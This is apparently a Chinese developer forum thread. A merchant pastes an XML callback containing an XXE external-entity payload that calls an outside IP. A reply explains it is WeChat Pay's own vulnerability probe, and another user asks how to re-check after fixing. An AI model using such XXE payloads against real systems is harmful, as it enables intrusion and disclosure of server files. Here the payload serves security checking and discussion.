<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM
"http://101.91.62.170:4837/wx_xxe_dbc_os_2018092803_79?aHR0cHM6Ly93d3cuamlhbmd4aW5nODg4LmNvbS9odWlTaGVuZ0h1by9hY3Rpb24vV2VpeGluUGF5Q2FsbGJhY2tBY3Rpb24vY2FsbGJhY2s=">]>
<foo>
<value>&xxe;</value>
</foo>
收到的XML 内容是这样的 自己查了查 好像是 XXE漏洞攻击。。我也不能确认 访问这个地址 也是 404 看看是不是官方给了什么东西我们漏掉了
你好,这个是微信官方检测商户是否存在安全问题的回调,详细可以查看https://pay.weixin.qq.com/wiki/doc/api/jsapi.php?chapter=23_5,如果没有问题,可以忽略此回调。
借贴,我们这边收到了警报,请问修复后如何主动检测?试过【安全医生】,但是域名验证过不了,浏览器都可以访问到验证文件,但是就是验证不了域名。